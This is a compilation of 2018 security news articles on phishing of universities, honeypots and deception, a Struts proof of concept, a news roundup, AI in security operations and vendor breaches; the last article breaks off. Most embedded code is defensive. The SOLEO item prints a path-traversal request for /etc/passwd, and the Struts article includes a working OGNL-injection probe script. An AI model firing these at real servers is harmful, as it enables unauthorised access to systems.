
Iranian Hackers Target Universities in Global Cyberattack Campaign

The Cobalt Dickens threat group is suspected of being behind a large-scale cyberattack wave targeting credentials used to access academic resources.

The school year has barely begun and things are off to a rocky start for some colleges: Cobalt Dickens, a threat group linked to the Iranian government, has been spotted targeting universities worldwide in a large-scale credential theft campaign.

Researchers in Secureworks’ Counter Threat Unit (CTU) uncovered the cyberattacks after initially spotting a URL spoofing a university login page. Further analysis of the IP address hosting the page revealed a massive operation involving 16 domains with more than 300 spoofed websites and login pages for 76 universities across 14 countries.

Attackers targeted schools in the United States, United Kingdom, Australia, Canada, China, Israel, Japan, and Turkey, among others; the largest concentration of affected universities was in the US. The researchers did not disclose which institutions were targeted but say they are working to alert them.

Victims who entered their credentials on a fake login page were redirected to the school’s legitimate website, where they were either logged into a valid browsing session or prompted to enter their username and password a second time. Several domains referred to the target institution’s online library systems, a sign of attackers trying to access academic resources.

Most domains in this campaign were tied to the same IP address and DNS name server. One domain, registered in May 2018, contained subdomains designed to spoof university targets and redirect visitors to fake login pages on other domains controlled by the attackers.

Many of the spoofed domains were registered between May and August 2018; the most recent was created on August 19. It seems threat actors were still building infrastructure to support the campaign at the time Secureworks’ CTU found it, researchers report in a blog post.

This campaign shared infrastructure with earlier Cobalt Dickens attacks on academic resources, a popular target for the threat group. In a previous campaign, its actors created lookalike domains to phish targets and used stolen credentials to steal intellectual property (IP).

“Cobalt Dickens’ motivation is to obtain access to subscriber-only academic resources as well as mailboxes of university staff and students,” says Rafe Pilling, information security researcher with the Secureworks CTU, of the August campaign. “Revenue generation is likely a key motivator, but the resulting access could be used for other campaigns like onward phishing and intrusion against targets that might implicitly trust contacts linked to educational institutions.” However, he notes, there has so far been no observation of this type of activity.

There are several reasons why universities are hot targets for attackers seeking IP. For starters, they’re harder to secure than financial companies, healthcare organizations, and other institutions in more regulated industries. They also attract some of the world’s most intelligent researchers and students, making them treasure troves of new ideas and information.

Post-Indictments

Earlier this year, the US Department of Justice indicted the Mabna Institute and nine Iranians for their involvement with Cobalt Dickens activity conducted between 2013 and 2017.

Many threat groups stick with their tactics despite disclosures like these, and CTU says the August activity could be a sign the group is continuing its campaigns despite its members’ indictments.

“This activity aligns with Cobalt Dickens’ previous MO,” says Pilling of the May-August campaign. “Based on our investigation, they haven’t seemed to have modified their tactics significantly when compared to the campaign they’ve been running over the past few years.”

“‘If it ain’t broke …’ as the saying goes,” he adds.

Pilling anticipates the activity will continue, as the DoJ indictments don’t appear to have been a strong deterrent. The basic rules of security hygiene apply: phishing awareness is key to defending against this type of activity, he says, and users should be taught what to look for and to avoid entering their credentials on a site linked from an email.

“Any email that wants you to click a link and enter credentials should be considered suspect,” he says.
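
As a small illustration of that advice (this is not from Secureworks’ report), a few lines of Python can flag lookalike hosts before anyone types a password. The known-good domain list here is hypothetical:

import difflib
from urllib.parse import urlparse

# Hypothetical list of domains this university's users should actually log in to.
LEGITIMATE_DOMAINS = {"login.example-university.edu", "library.example-university.edu"}

def looks_like_spoof(url, threshold=0.75):
    """Flag a URL whose host closely resembles, but does not match, a known-good domain."""
    host = urlparse(url).hostname or ""
    if host in LEGITIMATE_DOMAINS:
        return False  # exact match: the real site
    # A similarity ratio near 1.0, but below an exact match, suggests typosquatting.
    return any(
        difflib.SequenceMatcher(None, host, good).ratio() >= threshold
        for good in LEGITIMATE_DOMAINS
    )

print(looks_like_spoof("https://login.example-univers1ty.edu/auth"))  # True: near-miss host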


Article source: https://www.darkreading.com/endpoint/iranian-hackers-target-universities-in-global-cyberattack-campaign/d/d-id/1332676?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The Difference Between Sandboxing, Honeypots & Security Deception

A deep dive into the unique requirements and ideal use cases of three important prevention and analysis technologies.

Networks, cyberattacks, and the strategies used to stop them are continuously evolving. Security deception is an emerging cyber-defense tactic that allows researchers and information security professionals to observe the behavior of attackers once they’ve gained access to what they think is a business network.

The term “security deception” only came into wide usage in the last year, so it can be difficult to tell how exactly these solutions are different from other tools that try to trick attackers, such as sandboxing and honeypots. Like these other tactics, security deception fools attackers and malicious applications into revealing themselves so that researchers can devise effective defenses against them, but it relies more on automation and scale, and requires less expertise to set up and manage. Each of these technologies has unique requirements and ideal use cases. To understand what those are, we’ll need to look at each of them in more detail.

Sandboxing
The need for the analysis of network traffic and programs has existed almost since the dawn of networks and third-party programs. Sandboxing, introduced in the 1970s for testing artificial intelligence applications, allows malware to install and run in an enclosed environment, where researchers can monitor its actions to identify potential risks and countermeasures. Today, effective sandboxing is most often performed on dedicated virtual machines on a virtual host. This allows malware to be safely tested against multiple OS versions on machines that are segregated from the network. Security researchers use sandboxing when analyzing malware, and many advanced anti-malware products use it to determine whether suspicious files are truly malicious based on their behavior. These kinds of anti-malware solutions are becoming more important because so much of modern malware is obfuscated to avoid signature-based antivirus.
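
The behavioral-observation idea can be sketched in a handful of lines. This toy Python example offers no actual isolation (never run real malware this way), but it shows the before/after diffing that sandboxes perform at far greater depth, down to syscalls and network traffic:

import os
import subprocess
import sys

def snapshot(path):
    """Record every file under path with its size: a crude behavioral baseline."""
    state = {}
    for root, _dirs, files in os.walk(path):
        for name in files:
            full = os.path.join(root, name)
            state[full] = os.path.getsize(full)
    return state

def observe(sample_cmd, workdir):
    """Run a sample, then report files it created or modified. Toy only: no isolation."""
    before = snapshot(workdir)
    subprocess.run(sample_cmd, cwd=workdir, timeout=60)
    after = snapshot(workdir)
    created = sorted(set(after) - set(before))
    modified = sorted(f for f in before if f in after and before[f] != after[f])
    return created, modified

# Demo "sample": a harmless one-liner that drops a file, as malware often does.
created, modified = observe([sys.executable, "-c", "open('dropped.txt', 'w').write('x')"], ".")
print("created:", created, "modified:", modified)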

Most businesses aren’t capable of performing malware analysis with the same level of sophistication and expertise as a dedicated researcher or vendor. Smaller businesses typically benefit the most from deploying sandboxing as a service from a provider that already has implementations in place to automate the whole process.

Honeypots
Honeypots and honeynets are deliberately vulnerable systems meant to draw the attention of attackers. Honeypots are single hosts that entice attackers to attempt to steal valuable data or further scope out the target network. The idea behind honeynets, which began to circulate in 1999, is to understand the process and strategy of attackers. Honeynets are made up of multiple honeypots, often configured to emulate an actual network, complete with a file server, a web server, and so on, so that attackers believe they’ve successfully infiltrated a network. Instead, they’re actually in an isolated environment, under a microscope.

Honeypots let researchers watch how real threat actors behave, while sandboxing reveals only how malware behaves. Security researchers and analysts commonly use honeypots and honeynets for this exact purpose. Researchers as well as IT and security pros concerned with defense can use this information to improve their organization’s security by noting new attack methods and implementing new defenses to match. Honeynets will also waste attackers’ time and can get them to give up the attack in frustration. This is most useful for government organizations and financial institutions that are targeted by hackers often, but any business of medium size or larger will benefit from a honeynet. Small and medium-sized businesses (SMBs) may benefit as well, depending on their business model and security situation, but most SMBs today don’t have a security expert capable of setting up or maintaining a honeypot.
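
At its simplest, a honeypot is nothing more than a listener on a tempting port that records whoever shows up. A minimal sketch, for illustration only; production honeypots emulate real services and are carefully isolated from anything of value:

import socket
from datetime import datetime, timezone

HOST, PORT = "0.0.0.0", 2323  # 2323 stands in here for telnet, a commonly probed port

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((HOST, PORT))
    srv.listen()
    while True:
        conn, addr = srv.accept()
        with conn:
            conn.settimeout(5)
            try:
                first_bytes = conn.recv(1024)  # capture whatever the scanner sends first
            except socket.timeout:
                first_bytes = b""
            # In a real deployment this would feed a SIEM rather than stdout.
            print(f"{datetime.now(timezone.utc).isoformat()} {addr[0]}:{addr[1]} sent {first_bytes!r}")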

Cyber Deception
The core idea of cyber deception was first discussed in 1989 by Gene Spafford of Purdue University. Some argue that it more or less refers to modern, dynamic honeypots and honeynets and, fundamentally, they are correct. Security deception is a new term and so the definition hasn’t yet been set in stone, but in general it refers to a range of more-advanced honeypot and honeynet products that offer more automation for both detection and the implementation of defenses based on the data they gather.

It’s important to note that there are different levels to deception technologies. Some are little more than a honeypot, while others mimic full-blown networks that include real data and devices. Benefits include the ability to spoof and analyze different types of traffic, to provide fake access to accounts and files, and to more closely imitate an internal network. Some security deception products can be deployed automatically, keep attackers busy in loops of fake access, and give users more detailed and realistic responses to attackers. When a security deception product works as intended, hackers will truly believe they’ve infiltrated a restricted network and are gathering critical data. It’s true they’ll be accessing data, but only information you intend for them to see.
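
Honeytokens, a common building block in these products, show the idea at its smallest: plant a decoy secret that no legitimate process should ever touch, then alert on any access. A rough sketch using file access times (real products hook the filesystem or the network instead, not least because filesystems mounted noatime won't update access times reliably):

import os
import time

DECOY = "passwords-backup.txt"  # a filename chosen to tempt an intruder

# Plant the decoy with plausible-looking fake contents; the credential is valid nowhere.
with open(DECOY, "w") as f:
    f.write("admin:hunter2\n")

baseline = os.stat(DECOY).st_atime

while True:
    time.sleep(10)
    atime = os.stat(DECOY).st_atime
    if atime != baseline:
        # In a real deployment this would page the SOC, not print.
        print(f"ALERT: decoy {DECOY} was read at {time.ctime(atime)}")
        baseline = atime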

Security deception is still in its infancy, so as with most new security technologies, its initial use case is as a niche tool for large enterprises that will gradually move down market. At present, these tools are particularly relevant for high-profile targets such as government facilities, financial institutions, and research firms. Organizations still need a security analyst to parse the data from security deception tools, so smaller companies without specialized security staff typically wouldn’t be able to tap into the benefits. That said, SMBs can benefit from contracting with security vendors that offer analysis and protection as a service.

All these security technologies have their role in the prevention and analysis landscape. At a high level, sandboxing involves installing and allowing malware to run for behavioral observation, while honeypots and honeynets focus on the analysis of threat actors conducting reconnaissance on what they believe is an infiltrated network, and security deception is the more recent conception of advanced intrusion detection and prevention. Deception technologies offer more realistic honeynets that are easier to deploy and provide more information to users, but they come with higher budgetary and expertise requirements that typically restrict their use to large enterprises … at least for the moment.


Article source: https://www.darkreading.com/endpoint/the-difference-between-sandboxing-honeypots-and-security-deception/a/d-id/1332663?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

How Can We Improve the Conversation Among Blue Teams?

Dark Reading seeks new ways to bring defenders together to share information and best practices.

IT security pros, particularly those who work on blue teams doing everyday data defense, seldom have a chance to get together and share ideas on how to do their work better. How do you share best practices with colleagues in other organizations?

In 2017, Dark Reading launched a conference called INsecurity in Washington, D.C., to try to foster this conversation. The event sparked some fascinating interaction, but it was a struggle to get security pros to attend. This year, we put together another strong program of speakers and discussions scheduled for Chicago, but we failed to achieve critical mass in registrations and, last week, were forced to cancel the conference.

This raises the question: How do security pros get together and share ideas to improve their defenses? What methods do you use to share information, and how do you speak to colleagues in other organizations about best practices?

The bad guys are doing it. The IRC community and the Dark Web are filled with opportunities for online attackers to share ideas, buy and sell exploits, and explore opportunities to work together.

Security researchers are good at sharing information, too. Each year, numerous conferences – led by Black Hat’s events in the United States, Europe, and Asia – enable ethical hackers and red teamers to speak on the vulnerabilities they’ve found, the methods they used, and the methods for remediating the flaws.

For those who work on the blue team, however, the opportunities to share ideas with those in other organizations are less frequent – and often, less useful. While there are many cybersecurity events each year, most are limited to simple PowerPoint presentations by experts. There is little interaction among attendees, and even less conversation between organizations after the security pros return home to their own data centers.

If you’re lucky enough to work in an industry with a strong ISAC, you might find opportunities to share threat information and best practices there. And many of the security professional associations, including (ISC)2, ISSA, and ISACA, hold both national and regional conferences. InfraGard offers some opportunities to share ideas with government and law enforcement agencies.

As an industry, however, are we really doing enough to share problems and best practices – or are we keeping them mostly to ourselves, and reinventing the wheel separately, in our own silos? Have we become so afraid of leaking information that we don’t talk across enterprise boundaries at all?

It seems unlikely that the information security problem can be solved until we find meaningful ways of sharing knowledge and information about threats, security challenges, and how to address them. Ben Franklin said it best: If we don’t hang together, we will hang separately.

At Dark Reading, we are committed to finding ways to enable these conversations among data defenders. Aside from the news and commentary you see on these pages, we regularly conduct original research, webinars, virtual events, and live sessions and events at conferences such as Black Hat and Interop ITX.

But we want to do more, and we want to help you to find ways to interact in a useful way with colleagues in other organizations. So we put it to you: How do you share information and best practices with others in our industry? What works? What doesn’t? If you have thoughts, please add a comment to this column, or send us an email ([email protected]). We want to know how you’re communicating with colleagues today – and how you think the industry can communicate better in the future.


Article source: https://www.darkreading.com/how-can-we-improve-the-conversation-among-blue-teams/a/d-id/1332668?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Proof-of-Concept Released for Apache Struts Vulnerability

A Python script for easier exploitation of the flaw is now available on GitHub as well.

That didn’t take long: Last week, the Apache Foundation reported that a serious new vulnerability had been found in Struts. This week, proof-of-concept code for the flaw, including a Python script for easier code deployment, appeared on GitHub.

Unlike the flaw behind breaches such as the one at Equifax, this Struts vulnerability is the result of a specific configuration rather than a set of add-ins. While no exploit code had been found “in the wild” at the time of the original notice, the proof-of-concept code published on GitHub is likely to shorten the interval before real exploitation is attempted.

Meanwhile, Python code that probes for the vulnerability has been published to GitHub as well. A cursory examination of the script shows it is simple to check for the vulnerable configuration; the actual work is done in fewer than 20 lines of code.
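
The circulating checkers broadly share one trick: inject a harmless OGNL arithmetic expression where the Struts namespace belongs, and see whether the evaluated result comes back, which indicates the vulnerable configuration. The sketch below is a reconstruction of that general approach rather than the script in question, and the target host and action path are placeholders:

import requests

def probe(base_url, action="index.action"):
    """Check whether the namespace segment of a Struts URL is evaluated as OGNL.

    Sends ${(1337+73)} as the namespace; if "1410" appears in the redirect
    Location header or body, the server evaluated our expression.
    """
    url = f"{base_url}/${{(1337+73)}}/{action}"
    resp = requests.get(url, allow_redirects=False, timeout=10)
    evidence = resp.headers.get("Location", "") + resp.text[:2000]
    return "1410" in evidence

print(probe("http://struts-test.example.com"))  # hypothetical target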

Allan Liska, senior security architect at Recorded Future, says that exploiting the vulnerability now means that “a simple, well-crafted URL is enough to give an attacker access to a victim’s Apache Struts installation. There is already exploit code on Github, and underground forums are talking about how to exploit it.”

He warns that many large organizations may be unaware they are at risk, “because Struts underpins a number of different systems, including Oracle and Palo Alto.”

All Apache Struts users have been urged to update to version 2.3.35 or 2.5.17 as rapidly as possible to avoid exposure to remote code execution attacks exploiting the vulnerability.


Article source: https://www.darkreading.com/application-security/proof-of-concept-released-for-apache-struts-vulnerability/d/d-id/1332673?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Voting machine maker vows to step up security, Fortnite bribes players to do 2FA – and more

Roundup Summer rolls on, Reg vultures are making the most of their hols before the September rush hits, and in the past week, we saw Lazarus malware targeting Macs, Adobe scrambling to get an emergency patch out, and Democrats losing their minds over a simple training exercise.

Here’s what else went down…

SOLEO mission

Researchers at Project Insecurity have detailed a vulnerability in SOLEO’s IP relay technology that disclosed sensitive files on affected installations. For example, the following HTTPS request to a vulnerable service…

/IPRelayApp/servlet/IPRelay?page=../../../../../../../etc/passwd?

…would potentially return the system’s password file. The bug was fixed by SOLEO on August 10, and the fix pushed out to ISPs and other communications providers using the technology. We’re told by Project Insecurity that “essentially every internet service provider in Canada uses Soleo’s IP Relay service,” which means – it is claimed – tens of millions of Canadians were at risk until it was patched.
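
The underlying bug class is as old as CGI: the service evidently built a file path straight from the page parameter, so ../ sequences walked out of the web root. The standard fix is to resolve the requested path and confirm it still sits inside an allowed base directory, along these lines (a generic sketch, not SOLEO’s actual patch; the base directory is hypothetical):

from pathlib import Path

BASE_DIR = Path("/var/www/iprelay/pages").resolve()  # hypothetical web root

def safe_read(page_param: str) -> bytes:
    """Serve a page file only if it resolves to a location inside BASE_DIR."""
    candidate = (BASE_DIR / page_param).resolve()
    # resolve() collapses any ../ components; anything escaping BASE_DIR is refused.
    if BASE_DIR not in candidate.parents:
        raise PermissionError(f"path traversal attempt: {page_param!r}")
    return candidate.read_bytes()

# "../../../../../../../etc/passwd" resolves to /etc/passwd, outside BASE_DIR: refused.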

Slapped in the face with a Triout

Security researchers have unearthed a toolkit, dubbed Triout, for building extensive spying capabilities into seemingly benign Android applications.

A seemingly innocuous app was found repackaged using Triout to hide the presence of malicious code on a device, record phone calls as a media file, log incoming text messages, record videos, copy all photos taken by the front and rear cameras, and collect GPS coordinates. Harvested information was transmitted back to a miscreant-controlled command-and-control server.

Researchers at Bitdefender identified the Triout code this month and described it in detail.

Blast from the past

This is not strictly security related, other than involving an operating system that wasn’t considered particularly secure: Windows 95 has shown up as an Electron app for Linux, macOS, and Windows. It uses the x86 virtualization JavaScript tech dubbed v86 to run the OS. You can also, by the way, boot Windows 2000 in a browser window, using JavaScript, as well as Linux and FreeDOS, thanks to Qemu supremo Fabrice Bellard.

ESS ticks ballot for better security

A voting machine maker previously called out for its weak security is kicking off a campaign to harden its products from hackers.

ESS announced it was expanding its work with the US government’s Homeland Security and the Information Sharing and Analysis Centers (ISAC) to improve its security protections. The effort includes the installation of advanced threat monitoring and network security monitoring for ESS products and services as well as membership in a threat-sharing network that will allow the company to both send and receive alerts on new attacks.

One could ask why the manufacturer waited this long to improve the security protections in its stuff, but hey… better late than never. Also, it came a day after it was leaned on by US politicians, so there’s that.

Uncle Sam puts out a call for supply-chain security

Speaking of Homeland Security, the agency is looking to bring in outside vendors who have fresh ideas on securing IoT devices and supply chains.

Nextgov spotted a request from the department for proposals from IT suppliers who can help it make sure that foreign governments aren’t tampering with the individual components that get sold to organizations that, in turn, sell to government agencies.

As the report notes, this comes as the government has slapped bans on Chinese electronics vendors over fears that those companies were working a bit too closely with the government of their home country.

More industrial controllers left wide open to attacks

A team of researchers with Positive Technologies has disclosed a set of four exploitable security flaws in programmable logic controllers (PLCs) made by Schneider Electric and sold to heavy industries such as power plants, water departments, and oil refineries.

The four vulnerabilities would allow for things like authentication bypass, arbitrary code execution from web servers, and denial of service attacks. The flaws were disclosed in March, but are only now being detailed by Positive.

According to the researchers, the flaws would not be particularly difficult for an attacker to exploit, and could be used as a gateway to larger attacks, or just to cause general chaos at the targeted facility.

There is one saving grace here: the industrial controllers in question are all in the range of 20 years old. It’s not unheard of for embedded tech to stay in the field that long, but any device containing these bugs could probably do with a replacement, or at least a good update that includes new security protections.

Fortnite bribes kids to turn on 2FA

Runaway hit build’n’shoot game Fortnite has found a novel way to get players to make their accounts more secure. Developer Epic Games says that players who turn on two-factor authentication for their accounts will get access to a new dance move.

Adding the option for a verification code on an account now lets players perform an emote called “boogiedown” that, as its name implies, involves… erm… boogying down.

El Reg ran this by one of our Fortnite-playing vultures and, apparently, yes, an in-game dance move is something that the yoofs these days value enough to go through the hassle of two-factor login. Good work, Epic.

Speaking of Fortnite, Googlers have discovered that the game’s Android app – which famously sidestepped Google’s official Play Store – can be hijacked by malicious software on a device to install further dodgy code.

Darkness Falls on darknet drug-pushers

The FBI says it has nabbed a suspected dealer as part of a dark-web market takedown.

This time, it’s a Cleveland-based operation the Feds say was the largest online fentanyl dealer in the US, and the fourth-largest in the world. The alleged dealer, going by the handle MH4Life, was actually a couple, Matthew and Holley Roberts, both 35, it is claimed.

The pair were charged with using accounts on Silk Road, Dream Market, AlphaBay, and others to deal drugs from 2011 to 2018. The arrest was the headline result of the FBI’s Operation Darkness Falls, a takedown focusing on dark net drug dealers.

OpenSSH clears up ‘enumeration’ bug

The OpenSSH project has patched a vulnerability that could potentially allow an attacker to, without any authentication, work out the usernames of user accounts on a server.

The flaw, designated CVE-2018-15473, is an information-disclosure bug stemming from the way OpenSSH servers handle failures during login attempts. If you break a connection between a client and a server in a particular way while attempting a login, the response from the server differs depending on whether you were attempting to log in as a user that exists on the system or as an unknown username. Thus, an attacker could in theory work their way through all the possible usernames on a system, keeping a note of the ones that exist. This information can be leveraged to pull off other attacks, social engineering tricks, and so on.

It’s not exactly a critical bug, and OpenSSH decided to quietly patch it without making a big deal out of the whole thing.

“We have and will continue to fix bugs like this when we are made aware of them and when the costs of doing so aren’t too high,” explained developer Damien Miller, “but we aren’t going to get excited about them enough to apply for CVEs or do security releases to fix them.”

And finally…

Sales terminals in some Cheddar’s Scratch Kitchen restaurants across 23 US states may well have been hacked to steal payment card information between November 3, 2017, and January 2, 2018. A technique to steal crypto-keys from the electromagnetic radiation of a very nearby device has been detailed here. The described attack targeted OpenSSL, which was patched in May to thwart the snooping. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/27/security_roundup/

We can rebuild him, we have the technology: AI will help security teams smack pesky anomalies

Analysis With highly targeted cyber attacks the new normal, companies are finding the once-hidden Security Operations Centre (SOC) is the part of their setup they really count on.

SOCs have existed in a variety of guises for decades, emerging in recent years as a natural consequence of centralising security monitoring across organisations that have become increasingly geographically and technologically complex.

It made sense to put expertise in one place, or virtualize it across regions, to respond to the growth in security threats. Although SOCs have been hugely successful, their use of conventional tools and products in a world where known security threats are giving way to novel and unknown patterns is proving a challenge.

Although many successful security compromises are built from a toolkit of relatively simple techniques and common weaknesses, the chances of new attack patterns combining these with an unknown vulnerability have risen dramatically.

It’s difficult to estimate the scale of this phenomenon, but an unknown threat might be anything from an unexpected insider attack to one that abuses internal credentials or exploits one or more zero-day software flaws – recent examples from a SOC perspective would include the WannaCry and NotPetya attacks of 2017 that affected thousands of organisations across numerous sectors.

Once compromise became likely rather than merely possible, a breached SOC’s effectiveness came to be measured in terms of response, mitigation, and clean-up. Reacting in minutes or even seconds made the difference, as did the quality of security response plans. Detection was no longer the only game; SOCs needed to respond quickly or find themselves coping with a mess in the long run.

Now for AI

Faced with this growing reality, it’s not surprising that technologies flying under the AI banner have arrived like a saviour on the back of promises that are not always well-understood or explained.

The traditional SOC makes use of and depends upon layers of security sensors and systems, all of which generate information, often in the form of logs and events. For years, the answer to processing this was to channel as much as possible into repositories such as those used by Security Information and Event Management (SIEM). As the volume of event and log data grows, the complexity of analysis and decision making has increased, in turn leading to challenges in threat detection and response times.

But response times are now everything as organisations must accept they will be targeted and breached. This leaves them sitting uneasily between over-reactive detection, which generates too many false positives, and under-active detection, which leads to false negatives. It hasn’t helped, of course, that the people needed to detect, triage, respond to and, where necessary, escalate threat events, require an expanding suite of skills that are in perennially short supply.

AI – more specifically machine learning and big data analytics – has felt like a way out of this morass because it promises to do things that humans using SIEM have found difficult, namely correlate and spot anomalies quickly and in an automated way. The problem is that AI isn’t a standardised technology so much as a set of concepts and algorithms, which makes it hard to distinguish what’s hype and what’s not.

“If I were to reinvent it I’d call it ‘augmented intelligence’,” suggests Ian Glover, president of global ethical pen-testing body CREST, who worries that a useful concept is in danger of being misunderstood.

“What’s actually happening in relation to SOCs, is big data combined with AI to help with analytics,” he says.

In addition to response, AI’s other important benefit is the ability to learn more quickly – or at all – which goes back to the issue of unknown threats. Attacks evolve, employing different MOs as they look for and exploit weaknesses, but their development is always gradual. If AI analytics can be used to understand the deeper patterns of these small changes, the defenders have discovered a way of evolving with them.

Anomaly response

At its heart, SOC security rests on identifying the anomaly – data that stands out as being unusual or unexpected. Everything – tools, processes, the human response – is predicated on this. The limitation is that anomalies not only vary from network to network, device to device, and system to system, but are also inevitable. Most unusual behaviour by individual users, or the application or protocol traffic they generate, turns out to be completely innocent. Conversely, ordinary traffic can also hide anomalous traffic, as is the case when attackers abuse stolen privileged credentials. Conventional perimeter security finds this sort of compromise very hard to spot because it appears completely legitimate.

Using AI effectively in the SOC depends upon identifying anomalies in a sophisticated way using baselining. In theory, doing this requires the baselining of multiple data points and not simply one user or resource. The power of AI is that there is no theoretical limit to the number of data points that can be used to define a baseline and what is deviating from it.
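
In practice, that multi-dimensional baselining is ordinary machine learning. A minimal sketch using scikit-learn's IsolationForest, trained on a few features per login event; the features and numbers are illustrative, not any product's actual model:

import numpy as np
from sklearn.ensemble import IsolationForest

# One row per login event: [hour of day, bytes transferred, distinct hosts touched].
# Synthetic "normal" history: office-hours logins, modest transfers, few hosts.
rng = np.random.default_rng(0)
normal = np.column_stack([
    rng.integers(8, 18, 1000),
    rng.normal(50_000, 10_000, 1000),
    rng.integers(1, 4, 1000),
])

model = IsolationForest(contamination=0.01, random_state=0).fit(normal)

# A 3am login moving 5MB across 40 hosts should stand out from this baseline.
suspicious = np.array([[3, 5_000_000, 40]])
print(model.predict(suspicious))  # -1 means anomalous, 1 means within the baseline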

What AI brings is the ability to learn, that is to constantly adjust these parameters over time. “AI is going to be used to work out whether those anomalies are things we should be concerned about. But if all of a sudden we’re seeing anomalies and they’re all OK, then the AI system should feed back into the analytics system to say that this is an expected behaviour,” says Glover.

What none of this can replace is the role of the human decision makers, which in SOCs comprise layers of skills from detection, response, and mitigation right up to skilled forensics. AI can alert any one of these layers to the problem, but it is not yet capable of telling them what to do about it.

AI does not mean some magical transformation in which machines take over the job of defending networks from other, malevolent machines. It’s a tool in which humans are always the decision makers, using the analytics provided by machine intelligence to make better and quicker decisions.

“AI on its own is not the answer,” says Glover. “We should be using learning systems to feed back into the inference engines and analytics.” Conceptually, “data analytics and the AI allow analysis of data to be conducted faster. The final triage of invoking a cyber-response plan would go through the SOC managers.”

New-world SOCs

None of this really explains how AI can get to grips with the data problem that SIEM has struggled with – namely that simply adding more sensors and security layers risks creating more alerts that, in turn, confront SOCs with a greater number of situations to evaluate and possibly act on. How does a security manager in this world determine which alerts are worth following and which are phantoms unless they have some kind of reference point?

This is where User Behaviour Analytics (UBA) and, more recently, User and Entity Behavior Analytics (UEBA) have staked their claim. In UEBA, what matters first is not simply the idea of a baseline – a version of the “normal” from which an anomaly can be discerned – but that this is based on behaviour associated with network users and accounts.

Again, not a brand-new idea – user monitoring has been around for years – but for SOCs its power is enhanced by harnessing it to the possibilities offered by machine learning. Unlike rule-based systems, UEBA baselining with machine learning can adjust its worldview of a user’s behaviour, understanding it in greater depth as the user’s behaviour changes over time. It’s a principle that can be extended to applications and devices if need be.
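
Stripped to essentials, a per-entity baseline is just a running statistic keyed by user, updated with every event, with a z-score against the user's own history flagging deviation. A toy sketch, with an illustrative single feature and threshold:

from collections import defaultdict
import math

class UserBaseline:
    """Incremental per-user mean and variance (Welford's algorithm) for one feature."""
    def __init__(self):
        self.n, self.mean, self.m2 = 0, 0.0, 0.0

    def update(self, x):
        self.n += 1
        delta = x - self.mean
        self.mean += delta / self.n
        self.m2 += delta * (x - self.mean)

    def zscore(self, x):
        if self.n < 30:  # too little history to judge this user yet
            return 0.0
        std = math.sqrt(self.m2 / (self.n - 1)) or 1.0
        return (x - self.mean) / std

baselines = defaultdict(UserBaseline)

def observe(user, mb_downloaded, threshold=4.0):
    """Alert when a user's download volume deviates sharply from their own norm."""
    z = baselines[user].zscore(mb_downloaded)
    baselines[user].update(mb_downloaded)  # the baseline keeps learning as behaviour shifts
    if abs(z) > threshold:
        print(f"UEBA alert: {user} pulled {mb_downloaded} MB (z={z:.1f})")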

This should be the perfect job for machine learning: in this scenario, security analytics simply becomes the appliance of algorithms to what is just another big-data challenge. And machine learning, after all, grows on big data. But while the concept is sound, it’s early days for such systems and the proof of their effectiveness will be in the security they deliver in tackling real-world incidents.

The SOC defenders have time to perfect UEBA, but – perhaps, given the changing times and escalating threats – not as much as some of them would like. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/24/the_rise_of_neural_ai_and_what_it_means_for_security_teams/

Hackers clock personal deets on ‘two million’ T-Mobile US subscribers

T-Mobile US systems were hacked this week, the cellular giant confirmed in a brief note on its website.

The break-in was spotted on August 20 by the firm’s cyber-security team, it said, and the miscreants were booted out the same day.

“Out of an abundance of caution, we wanted to let you know about an incident that we recently handled that may have impacted some of your personal information,” T-Mobile US warned.

According to Vice magazine’s tech news offshoot Motherboard, the invading miscreants were able to potentially access information on about two million customers – 3 per cent of T-Mobile US’s subscribers.

The US telco said no customer financial data or social security numbers were lifted, and no plaintext passwords were leaked – although we gather that hashed passwords were exposed to the hackers.

“You should know that some of your personal information may have been exposed, which may have included one or more of the following: name, billing zip code, phone number, email address, account number and account type (prepaid or postpaid),” the carrier told its subscribers.

T-Mo added that it had reported the cyber-intrusion to the “authorities”, without specifying which ones. The security breach was caused when “an international group” of hackers accessed a server through an API that was said not to expose any “very sensitive data”.

“As a reminder, it’s always a good idea to regularly change account passwords,” it chirpily added.

EE, which absorbed T-Mo’s UK operations, confirmed to El Reg that no Brits were affected. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/24/t_mobile_us_data_breach/

Well, can’t get hacked if your PC doesn’t work… McAfee yanks BSoDing Endpoint Security patch

McAfee has pulled a version of its Endpoint Security software after folks reported the antivirus software was crashing their Windows machines.

The security giant said it has taken down the August update for Endpoint Security 10.5.4, and is advising anyone who has downloaded but not yet installed it to hold off.

“McAfee has removed ENS 10.5.4 August Update from the Product Downloads site,” customers were told. “For those customers that have already downloaded ENS 10.5.4 August Update, McAfee recommends to not install this update.”

According to McAfee’s advisory, the issue affects the latest versions of Endpoint Security, ENS Common Client, ENS Firewall, ENS Threat Prevention, and ENS Web Control. The software triggers blue-screen-of-death crashes on Windows 7 and 10 PCs, and Server editions of the Microsoft operating system, whether the OS is running on bare metal or in a virtual machine.

The decision to yank the update comes a week after McAfee began getting complaints from users who said the upgrade was causing both blue screen crashes and random restarts.

At least one Reg reader told us the issue is causing problems for their business. Our tipster, who asked to remain anonymous, noted that the issue, which McAfee traced back to a bad driver, seems to be worse on servers and systems with a lot of CPU cores and higher activity loads.

As of right now, the workarounds are limited to either not installing the bad update, or removing it and reinstalling an earlier build of ENS 10.5.4. Unfortunately, McAfee doesn’t as yet have an ETA on when a fixed build will land.

“McAfee is investigating the issue and is working to provide a solution,” a spokesperson told El Reg. “We will communicate the latest information to our customers as soon as it becomes available.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/08/24/mcafee_blue_screen_of_death/

Now that’s a fortune cookie! Facebook splats $5k command-injection bug in one of its servers

Facebook has patched a remote-code execution flaw discovered in one of its servers.

Researcher Daniel ‘Blaklis’ Le Gall, of SCRT Information Security, said on Friday he bagged a $5,000 bug bounty from the social network for reporting a flaw that could be exploited to execute arbitrary commands using malicious cookies.

